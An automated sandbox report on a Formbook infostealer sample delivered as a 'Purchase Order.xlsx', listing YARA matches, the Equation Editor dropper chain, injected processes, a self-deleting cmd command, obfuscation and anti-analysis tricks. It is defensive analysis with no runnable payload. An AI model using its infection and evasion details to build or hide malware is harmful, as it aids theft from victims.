Source: acqyswhf.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: acqyswhf.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: acqyswhf.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: acqyswhf.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: dtz25z5e9sr.exe.5.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: dtz25z5e9sr.exe.5.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: dtz25z5e9sr.exe.5.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: dtz25z5e9sr.exe.5.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: dtz25z5e9sr.exe.5.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: dtz25z5e9sr.exe.5.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Yara signature match
Source: 00000006.00000002.2204900441.00000000001F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.2204900441.00000000001F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.2204979251.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.2204979251.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2169563317.0000000000220000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2169563317.0000000000220000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.2380114742.00000000000B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.2380114742.00000000000B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.2204962869.00000000003C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.2204962869.00000000003C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.2380245950.0000000000210000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.2380245950.0000000000210000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000001.2167976340.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000001.2167976340.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.2380085574.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.2380085574.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.acqyswhf.exe.220000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.acqyswhf.exe.220000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.acqyswhf.exe.220000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.acqyswhf.exe.220000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.dtz25z5e9sr.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.dtz25z5e9sr.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.1.dtz25z5e9sr.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.1.dtz25z5e9sr.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.1.dtz25z5e9sr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.1.dtz25z5e9sr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.dtz25z5e9sr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.dtz25z5e9sr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: explorer.exe, 00000008.00000000.2181773215.0000000003C40000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@12/12@12/8
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_2_00C3A6AD GetLastError,FormatMessageW, 5_2_00C3A6AD
Source: C:\Users\Public\vbc.exe Code function: 4_2_00403461 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 4_2_00403461
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040473E GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 4_2_0040473E
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_2_00C34148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 5_2_00C34148
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040216B CoCreateInstance,MultiByteToWideChar, 4_2_0040216B
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_2_00C3443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx, 5_2_00C3443D
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$Purchase Order.xlsx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRD39.tmp Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Purchase Order.xlsx ReversingLabs: Detection: 23%
Source: acqyswhf.exe String found in binary or memory: The device has succeeded a query-stop and its resource requirements have changed.
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\invbat.p
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\invbat.p
Source: unknown Process created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
Source: unknown Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\invbat.p Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Process created: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\invbat.p Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: Purchase Order.xlsx Static file information: File size 2507264 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: wntdll.pdb source: acqyswhf.exe, dtz25z5e9sr.exe, svchost.exe
Source: Binary string: svchost.pdb source: dtz25z5e9sr.exe, 00000006.00000002.2204947224.00000000002C4000.00000004.00000020.sdmp
Source: Purchase Order.xlsx Initial sample: OLE indicators vbamacros = False
Source: Purchase Order.xlsx Initial sample: OLE indicators encrypted = True

Data Obfuscation:

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Unpacked PE file: 6.2.dtz25z5e9sr.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_2_00BE4B77 LoadLibraryA,GetProcAddress, 5_2_00BE4B77
PE file contains an invalid checksum
Source: vbc.exe.2.dr Static PE information: real checksum: 0x0 should be: 0xcb8fe
Source: scancopy87867678[1].exe.2.dr Static PE information: real checksum: 0x0 should be: 0xcb8fe
Source: dtz25z5e9sr.exe.5.dr Static PE information: real checksum: 0xdf890 should be: 0xe835e
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00418855 push cs; iretd 6_2_0041885C
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_004070C8 push ecx; retf 6_2_004070CE
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_0040BACC push esp; retf 6_2_0040BACD
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_004092E8 push cs; iretd 6_2_004092ED
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_004162B3 push esp; retf 6_2_004162CF
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_0041B3C5 push eax; ret 6_2_0041B418
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_0041B47C push eax; ret 6_2_0041B482
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_0041B412 push eax; ret 6_2_0041B418
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_0041B41B push eax; ret 6_2_0041B482
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_0041CF7F push es; iretd 6_2_0041CF80
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_0041CFC2 push dword ptr [ebp-4DC2E796h]; iretd 6_2_0041CFD0
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BEDFA1 push ecx; ret 6_2_00BEDFB4
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_1_004070C8 push ecx; retf 6_1_004070CE
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_1_004092E8 push cs; iretd 6_1_004092ED
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_1_004162B3 push esp; retf 6_1_004162CF
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_1_0041B3C5 push eax; ret 6_1_0041B418
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_1_0041B47C push eax; ret 6_1_0041B482
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_1_0041B412 push eax; ret 6_1_0041B418
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_1_0041B41B push eax; ret 6_1_0041B482
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_1_00418855 push cs; iretd 6_1_0041885C
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_1_0040BACC push esp; retf 6_1_0040BACD
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_1_0041CF7F push es; iretd 6_1_0041CF80
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_1_0041CFC2 push dword ptr [ebp-4DC2E796h]; iretd 6_1_0041CFD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0085DFA1 push ecx; ret 10_2_0085DFB4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0009C04B push ss; iretd 10_2_0009C04E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_000870C8 push ecx; retf 10_2_000870CE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_000962B3 push esp; retf 10_2_000962CF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_000892E8 push cs; iretd 10_2_000892ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0009B3C5 push eax; ret 10_2_0009B418
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0009B41B push eax; ret 10_2_0009B482
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0009B412 push eax; ret 10_2_0009B418

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe File created: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\scancopy87867678[1].exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_2_00BE5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 5_2_00BE5EDA
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_2_00BF33B7 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 5_2_00BF33B7
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: Purchase Order.xlsx Stream path 'EncryptedPackage' entropy: 7.99991439785 (max. 8.0)

Malware Analysis System Evasion:

barindex
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe RDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe RDTSC instruction interceptor: First address: 00000000000885F4 second address: 00000000000885FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe RDTSC instruction interceptor: First address: 000000000008898E second address: 0000000000088994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_3_03C60501 rdtsc 5_3_03C60501
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2332 Thread sleep time: -360000s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 2992 Thread sleep time: -45000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 752 Thread sleep time: -38000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\svchost.exe Last function: Thread delayed
